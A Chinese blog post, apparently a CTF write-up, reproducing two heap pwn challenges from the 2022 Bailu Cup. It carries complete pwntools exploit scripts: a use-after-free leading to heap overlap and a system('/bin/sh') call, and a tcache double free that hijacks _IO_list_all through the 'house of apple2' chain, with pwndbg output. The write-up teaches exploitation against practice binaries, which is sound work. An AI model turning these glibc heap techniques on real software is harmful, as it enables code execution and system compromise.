2022柏鹭杯pwn复现

最新推荐文章于 2024-07-30 17:23:09 发布
最新推荐文章于 2024-07-30 17:23:09 发布
阅读量1.3k 收藏
点赞数 7
文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/127931004
版权

note1

个人感觉这个题逆向分析还是稍微有点复杂的,特别是堆块的初始化,建议先写完函数后gdb看一下堆块初始化存放的东西然后结合ida分析会容易理解点。

漏洞分析

 题目实现了创建,编辑,调用三个功能

这里限定了只能申请0和1两个堆块。 

功能三主要是一个存放在堆上的一个show功能的函数,可以打印堆块内容

 

 在edit_name函数里有一个free操作,但是并未制空指针,并且name length也是我们重新输入的,这就给了我们构造堆块重叠修改堆块内容的可能。也正是利用这一点实现libc的泄露以及get  shell。

exp

from pwn import *
context.log_level='debug'
r=process('./note1')
elf=ELF('./note1')
libc=elf.libc

def add(id,len,name,tag,func):
    r.sendlineafter("> ",'1')
    r.sendlineafter("id: ",str(id))
    r.sendlineafter("name_length: ",str(len))
    r.sendlineafter("name: ",name)
    r.sendlineafter("tag: ",tag)
    r.sendlineafter("func: ",str(func))
def edit1(id,len,name):
    r.sendlineafter("> ",'2')
    r.sendlineafter("id: ",str(id))
    r.sendlineafter("> ",str(1))
    r.sendlineafter("name_length: ",str(len))
    r.sendlineafter("name: ",name)

def edit2(id,tag):
    r.sendlineafter("> ",'2')
    r.sendlineafter("id: ",str(id))
    r.sendlineafter("> ",str(2))
    r.sendafter("new tag: ",tag)

def edit3(id,func):
    r.sendlineafter("> ",'2')
    r.sendlineafter("id: ",str(id))
    r.sendlineafter("> ",str(3))
    r.sendlineafter("func: ",str(func))

def call(id):
    r.sendlineafter("> ",'3')
    r.sendlineafter("id: ",str(id))

add(0,0x500,'a'*0x100,'b',1)
edit2(0,'a'*8)
edit3(0,1)
call(0)
r.recvuntil('a'*8)
leak1=u64(r.recv(6).ljust(8,b'\x00'))
print("leak1->",hex(leak1))
pie_base=leak1-0x131b
print("pie_base->",hex(pie_base))
puts_got=pie_base+0x3f88
puts_plt=pie_base+0x1100
edit1(0,0x17,'')
add(1,0x17,'','',1)
edit1(0,0x101,b'c'*0x20+p64(0)+p64(pie_base+0x131b)+p64(puts_got))
call(1)
leak2=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("leak2->",hex(leak2))
libc_base=leak2-libc.sym['puts']
print("libc_base->",hex(libc_base))
system=libc_base+libc.sym['system']
binsh=libc_base+next(libc.search(b'/bin/sh\x00'))
edit1(0,0x101,b'c'*0x20+b'/bin/sh\x00'+p64(system))
call(1)
# gdb.attach(r)
r.interactive()

分析

首先执行第一行add,看一下堆块初始化

add(0,0x500,'a'*0x100,'b',1)
edit2(0,'a'*8)
edit3(0,1)
call(0)
r.recvuntil('a'*8)
leak1=u64(r.recv(6).ljust(8,b'\x00'))
print("leak1->",hex(leak1))
pie_base=leak1-0x131b
print("pie_base->",hex(pie_base))
puts_got=pie_base+0x3f88
puts_plt=pie_base+0x1100

这里泄露程序基地址

edit1(0,0x17,'')
add(1,0x17,'','',1)
edit1(0,0x101,b'c'*0x20+p64(0)+p64(pie_base+0x131b)+p64(puts_got))
call(1)

由于我们edit把name的长度改为0x20,那么再申请堆块1就会从0x20处开始申请,但是由于之前0x500的堆块0的指针没有制空,因此我们可以通过修改堆块0把堆块1的内容进行修改从而泄露libc

 这里解释一下,为什么写入的got表,打印的却是libc地址,看一下程序里的打印函数

 

 这里打印的name其实是0x20堆块(每一个name堆块上边的一个)里的第二行,打印的是这个地址里的内容,所以可以泄露出libc。

edit1(0,0x101,b'c'*0x20+b'/bin/sh\x00'+p64(system))
call(1)

然后在通过堆块堆叠修改堆块0改堆块1原来的show功能为system,这里的tag位置为'/bin/sh\x00'

然后就call1,就调用system("/bin/sh\x00")。

note2

刚学完apple2,然后来看这个题,当时看到这个题用apple2做的时候,第一想法先把apple2学了。

不会apple2的移步(23条消息) house of apple2(改进)_KingKi1L3r的博客-CSDN博客

这里参考z1r0师傅的exp(5条消息) 2022 网信柏鹭杯 pwn2 note2_z1r0.的博客-CSDN博客

漏洞分析

四个功能创建,释放,打印,退出

退出是exit,那么就想到用apple2的调用链

 

存在uaf漏洞

exp

from pwn import *
context.log_level='debug'
r=process('./note2')
elf=ELF('./note2')
libc=elf.libc

def add(index,size,content):
    r.sendlineafter("------------",'1')
    r.sendlineafter("Index?",str(index))
    r.sendlineafter("Size?",str(size))
    r.sendlineafter("Enter content: ",content)

def delete(index):
    r.sendlineafter("------------",'2')
    r.sendlineafter("Index?",str(index))

def show(index):
    r.sendlineafter("------------",'3')
    r.sendlineafter("Index?",str(index))

for i in range(8):#0-7
    add(i,0x80,'aaaa')
add(8,0x80,'bbbb')#8
for i in range(8):
    delete(i)
show(7)
leak=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("leak->",hex(leak))
libc_base=leak-0x219ce0
print("libc_base->",hex(libc_base))
_IO_list_all = libc_base + libc.sym['_IO_list_all']
system_addr = libc_base + libc.sym['system']
_IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
one_gadget=[0x50a37,0xebcf1,0xebcf5,0xebcf8,0xebd52,0xebdaf,0xebdb3]
ogg=libc_base+one_gadget[1]

show(0)
r.recv()
key = u64(r.recv(5).ljust(8,b'\x00'))
print("key->",hex(key))
heap_base=key<<12
print("heap_base->",hex(heap_base))

for i in range(8):
    add(i, 0x80, 'aaaa')

for i in range(8):
    add(i, 0x70, 'aaaa')

add(8, 0x70, 'aaaa')

for i in range(8):
    delete(i)

delete(8)
delete(7)#double free

for i in range(7):
    add(i, 0x70, 'aaaa')

p1 = p64(key ^ _IO_list_all)
print(hex(key ^ _IO_list_all))
add(0, 0x70, p1)
add(1, 0x70, 'aaa')
add(2, 0x70, 'aaa')

target_addr = heap_base + 0xc30
add(0, 0x70, p64(target_addr))

p2 = b'\x00'
p2 = p2.ljust(0x28, b'\x00') + p64(1)
p2 = p2.ljust(0xa0, b'\x00') + p64(target_addr + 0xe0)
p2 = p2.ljust(0xd8, b'\x00') + p64(_IO_wfile_jumps)
p2 = p2.ljust(0xe0 + 0xe0, b'\x00') + p64(target_addr + 0x210)

add(1, 0x200, p2)

p3 = b'\x00'
p3 = p3.ljust(0x68, b'\x00') + p64(ogg)
add(2, 0x200, p3)
r.sendlineafter("> ", '4')

# gdb.attach(r)
r.interactive()

思路

1.首先释放堆块到unsortedbin和tcachebin中,然后show打印堆地址和libc地址

2.通过uaf漏洞申请到_IO_list_all那块空间进行构造,构造方法跟apple2一样

3.exit退出执行调用链

分析

for i in range(8):#0-7
    add(i,0x80,'aaaa')
add(8,0x80,'bbbb')#8
for i in range(8):
    delete(i)
show(7)
leak=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("leak->",hex(leak))
libc_base=leak-0x219ce0
print("libc_base->",hex(libc_base))
_IO_list_all = libc_base + libc.sym['_IO_list_all']
system_addr = libc_base + libc.sym['system']
_IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
one_gadget=[0x50a37,0xebcf1,0xebcf5,0xebcf8,0xebd52,0xebdaf,0xebdb3]
ogg=libc_base+one_gadget[1]

show(0)
r.recv()
key = u64(r.recv(5).ljust(8,b'\x00'))
print("key->",hex(key))
heap_base=key<<12
print("heap_base->",hex(heap_base))

首先通过释放堆块泄露地址

for i in range(8):
    add(i, 0x80, 'aaaa')

for i in range(8):
    add(i, 0x70, 'aaaa')

add(8, 0x70, 'aaaa')

for i in range(8):
    delete(i)

delete(8)
delete(7)#double free

for i in range(7):
    add(i, 0x70, 'aaaa')

p1 = p64(key ^ _IO_list_all)
print(hex(key ^ _IO_list_all))
add(0, 0x70, p1)
add(1, 0x70, 'aaa')
add(2, 0x70, 'aaa')

target_addr = heap_base + 0xc30
add(0, 0x70, p64(target_addr))

制造uaf,修改指针指向_IO_list_all,注意这里指针有一个加密操作,需要异或key

 申请这个堆块并将堆块内容写到另一个堆块上,从而伪造_IO_list_all

p2 = b'\x00'
p2 = p2.ljust(0x28, b'\x00') + p64(1)
p2 = p2.ljust(0xa0, b'\x00') + p64(target_addr + 0xe0)
p2 = p2.ljust(0xd8, b'\x00') + p64(_IO_wfile_jumps)
p2 = p2.ljust(0xe0 + 0xe0, b'\x00') + p64(target_addr + 0x210)

add(1, 0x200, p2)

p3 = b'\x00'
p3 = p3.ljust(0x68, b'\x00') + p64(ogg)
add(2, 0x200, p3)

pwndbg> p *_IO_list_all
$1 = {
  file = {
    _flags = 0,
    _IO_read_ptr = 0x0,
    _IO_read_end = 0x0,
    _IO_read_base = 0x0,
    _IO_write_base = 0x0,
    _IO_write_ptr = 0x1 <error: Cannot access memory at address 0x1>,
    _IO_write_end = 0x0,
    _IO_buf_base = 0x0,
    _IO_buf_end = 0x0,
    _IO_save_base = 0x0,
    _IO_backup_base = 0x0,
    _IO_save_end = 0x0,
    _markers = 0x0,
    _chain = 0x0,
    _fileno = 0,
    _flags2 = 0,
    _old_offset = 0,
    _cur_column = 0,
    _vtable_offset = 0 '\000',
    _shortbuf = "",
    _lock = 0x0,
    _offset = 0,
    _codecvt = 0x0,
    _wide_data = 0x55b4b440fd10,
    _freeres_list = 0x0,
    _freeres_buf = 0x0,
    __pad5 = 0,
    _mode = 0,
    _unused2 = '\000' <repeats 19 times>
  },
  vtable = 0x7f8d0c6070c0 <_IO_wfile_jumps>
}

 

 

pwndbg> p *(struct _IO_wide_data *)0x55b4b440fd10                                                                                                                                                                                                                             
$2 = {                                                                                                                                                                                                                                                                        
  _IO_read_ptr = 0x0,                                                                                                                                                                                                                                                         
  _IO_read_end = 0x0,                                                                                                                                                                                                                                                         
  _IO_read_base = 0x0,                                                                                                                                                                                                                                                        
  _IO_write_base = 0x0,                                                                                                                                                                                                                                                       
  _IO_write_ptr = 0x0,                                                                                                                                                                                                                                                        
  _IO_write_end = 0x0,                                                                                                                                                                                                                                                        
  _IO_buf_base = 0x0,                                                                                                                                                                                                                                                         
  _IO_buf_end = 0x0,                                                                                                                                                                                                                                                          
  _IO_save_base = 0x0,                                                                                                                                                                                                                                                        
  _IO_backup_base = 0x0,                                                                                                                                                                                                                                                      
  _IO_save_end = 0x0,                                                                                                                                                                                                                                                         
  _IO_state = {                                                                                                                                                                                                                                                               
    __count = 0,                                                                                                                                                                                                                                                              
    __value = {                                                                                                                                                                                                                                                               
      __wch = 0,                                                                                                                                                                                                                                                              
      __wchb = "\000\000\000"                                                                                                                                                                                                                                                 
    }                                                                                                                                                                                                                                                                         
  },                                                                                                                                                                                                                                                                          
  _IO_last_state = {                                                                                                                                                                                                                                                          
    __count = 0,                                                                                                                                                                                                                                                              
    __value = {                                                                                                                                                                                                                                                               
      __wch = 0,                                                                                                                                                                                                                                                              
      __wchb = "\000\000\000"                                                                                                                                                                                                                                                 
    }                                                                                                                                                                                                                                                                         
  },                                                                                                                                                                                                                                                                          
  _codecvt = {                                                                                                                                                                                                                                                                
    __cd_in = {                                                                                                                                                                                                                                                               
      step = 0x0,                                                                                                                                                                                                                                                             
      step_data = {                                                                                                                                                                                                                                                           
        __outbuf = 0x0,                                                                                                                                                                                                                                                       
        __outbufend = 0x0,                                                                                                                                                                                                                                                    
        __flags = 0,                                                                                                                                                                                                                                                          
        __invocation_counter = 0,                                  
        __internal_use = 0,                                        
        __statep = 0x0,                                            
        __state = {   
         __count = 0,
          __value = {
            __wch = 0,
            __wchb = "\000\000\000"
          }
        }
      }
    },
    __cd_out = {
      step = 0x0,
      step_data = {
        __outbuf = 0x0,
        __outbufend = 0x0,
        __flags = 0,
        __invocation_counter = 0,
        __internal_use = 0,
        __statep = 0x0,
        __state = {
          __count = 0,
          __value = {
            __wch = 0,
            __wchb = "\000\000\000"
          }
        }
      }
    }
  },
  _shortbuf = L"",
  _wide_vtable = 0x55b4b440fe40
}
                  

pwndbg> p *(const struct _IO_jump_t *) 0x55b4b440fe40
$3 = {
  __dummy = 0,
  __dummy2 = 0,
  __finish = 0x0,
  __overflow = 0x0,
  __underflow = 0x0,
  __uflow = 0x0,
  __pbackfail = 0x0,
  __xsputn = 0x0,
  __xsgetn = 0x0,
  __seekoff = 0x0,
  __seekpos = 0x0,
  __setbuf = 0x0,
  __sync = 0x0,
  __doallocate = 0x7f8d0c4dccf1 <__execvpe+1137>,
  __read = 0xa,
  __write = 0x0,
  __seek = 0x0,
  __close = 0x0,
  __stat = 0x0,
  __showmanyc = 0x0,
  __imbue = 0x0
}

动态调试

 

 

 

 

 

 

 

 成功get shell!

KingKi1L3r
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pwn 堆入门之tcache
清霂的博客
05-13 472
目录ciscn_final_3ciscn_2019_es_1 ciscn_final_3 #!/usr/bin/env python3 # coding=utf-8 from pwn import * arch = "amd64" filename = "ciscn_final_3" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc l
pwn 进阶(1)
weixin_44113469的博客
02-07 913
pwn 进阶(1) 0x01 XCTF 高校战’疫’分享赛盘 easyheap free后指针残留,可以溢出,最后要造成一个任意写 from pwn import* context.log_level = "debug" #p = process("./easyheap") p = remote("121.36.209.145",9997) elf = ELF("./libc.so.6") def new(size,content,test): p.recvuntil("choice:")
2022 网信pwn2 note2
z1r0的博客
09-17 636
因2.34之后取消了malloc,free hook这两个在堆pwn中用的最多的hook,roderick师傅分享的house of apple学习了一下,是一个非常好用的调用链,包括house of emma, house of kiwi, house of banana, house of pig, house of cat都是极好的调用链,前天的网信杯里的pwn2是2.35的,笔者学完apple之后这里拿的2.34做的,只需要改偏移就可以打通2.35的。
pwn】2021 祥云杯 (部分)
woodwhale的博客
10-07 4181
pwn】2021 祥云杯 (部分) 前言 国庆的最后几天,一直在补题,发祥云杯那个时候一道堆题都不会,直接开始补题。 补题过程中,发自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云杯里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
2022蓝帽pwn初赛wp
N1rvana的博客
07-10 485
2022蓝帽pwn wp
安洵杯2023 部分pwn
臭nana的博客
06-26 1041
漏洞点:覆盖printf的返回地址。
2021 祥云杯 pwn-note
z1r0的博客
10-14 358
在第一个图那里下个断点,查看stack时发%11$p这里有一个stdout,这个给了我们泄露libc的机会,我们可以打stdout的flag和write_ptr,具体的可以看别的师傅对stdout泄露libc分析的文章。偏移为7, 这里笔者用的ubuntu20.04的2.31libc做的,不需要利用realloc来调整可以直接利用,题目给的libc需要利用realloc来调整一下即可。拿到libc之后,算出ogg,ogg出来了,可以再利用scanf任意地址写打malloc为ogg。
【大赛手册】2018年“杯”大学生网络空间安全精英赛大赛手册1
08-03
3. 承办单位 4. 协办单位 2. 报到需提交的材料 3.参赛队伍管理 1.美亚科培训中心楼层说明 2.工作人员信息表 3.路线安排 4.厦门美食推荐
【参赛指南】2018杯大学生网络空间安全竞赛组委会参赛指南1
08-03
【2018杯大学生网络空间安全竞赛】是一场针对国内外高校在校本科生和研究生的网络安全赛事,旨在提升学生的网络安全技术和实战能力。比赛分为突围赛和总决赛两个阶段。 **突围赛**采取**Jeopardy解题模式**,...
2020第六届上海市大学生网络安全大赛pwn wp
qq_45595732的博客
11-26 649
2020年全国大学生网络安全邀请赛暨第六届上海市大学生网络安全大赛 体验一般,前三道2道原题一道常规题,cpu_emulator还挺有意思 EASY_ABNORMAL ​ 湖湘杯2020原题,修改了提示字符而已,漏洞点在于格式化字符串和c++一个异常的处理,完全可以直接调出来,在后面函数输入非法的程序就会被劫持。 ​ glibc2.23 exp from pwn import* context.log_level = 'debug' context.update(arch='amd64',os='lin
2022祥云杯pwn
m0_63437215的博客
11-05 402
2022祥云杯pwn
PWN学习-ADworld刷题
WocW的博客
06-04 1592
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
2021-NCTF pwn方向题目
Amalllの博客
12-01 3467
周末在学校摸鱼了所以没有参加比赛,赛后看题又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1、easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf漏洞点外加并没有啥其他的限制所以利用起来没有什么难度 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(..
如何安全快速地部署多道ctf pwn比赛题目
giantbranch的专栏
10-09 5586
前言 一开始接触pwn的时候,我们要么本地调试,要么自己用socat将程序启动起来远程调试 最近去搞pwn培训,发pwn题一个一个部署起来还是比较繁琐,除了权限还要考虑其他东西 后来一顿搜索,看看有无别人的解决方案,发一个xinted + docker的方案: https://github.com/Eadom/ctf_xinetd 但是对于这个我发了一些缺点: 需要自己配置flag 需要...
181124 逆向-2018“杯”厦大邀请赛初赛(Re1、2)
whklhhhh的博客
11-24 2420
总体来说逆向的题目质量挺高~感觉学到了不少东西=-= 就是第三题放题时间有点晚233没有公网的情况下做题难度确实比较大 欢迎各位师傅交流~ Re1 JAVA层 用JEB查看反编译代码,JAVA层做了如下操作 有点绕,不知道是出题人故意还是无意地,这个处理写的很蛋疼 除了上述列出的字符以外都是保留不变的 output的范围是彼此分开的,因此可以写出该处理的反函数 def decode(x): ...
[BUUCTF]PWN——zctf2016_note2(unlink)
mcmuyanga的博客
02-07 816
zctf2016_note2 附件 步骤 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入,方便看程序,我修改了函数名 New_note() 定义的时候i是unsigned_int64,但是for循环里的i是int64.我们都知道,在c语言中,无符号变量和有符号变量比较时,会将有符号变量转化为无符号变量来比较。所以这里size为0的时候。(unsigned int)(size-1)就就是非常大的整数,存在整数溢出漏洞 show_not
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 587
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个堆块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
【Python】pandas:排序、重值、缺省值处理、合并、分组
最新发布
yannan20190313的博客
07-30 863
【Python】pandas:排序(sort_index,sort_values,nsmallest,nlargest)、重值(duplicated,drop_duplicates,value_counts,nunique)、缺省值处理(isna,isnull,notna,notnull,fillna,dropna,replace)、合并(join,merge,append,concat)、分组(groupby)
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 1003
详细解说数据分析pandas库中的常用方法
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值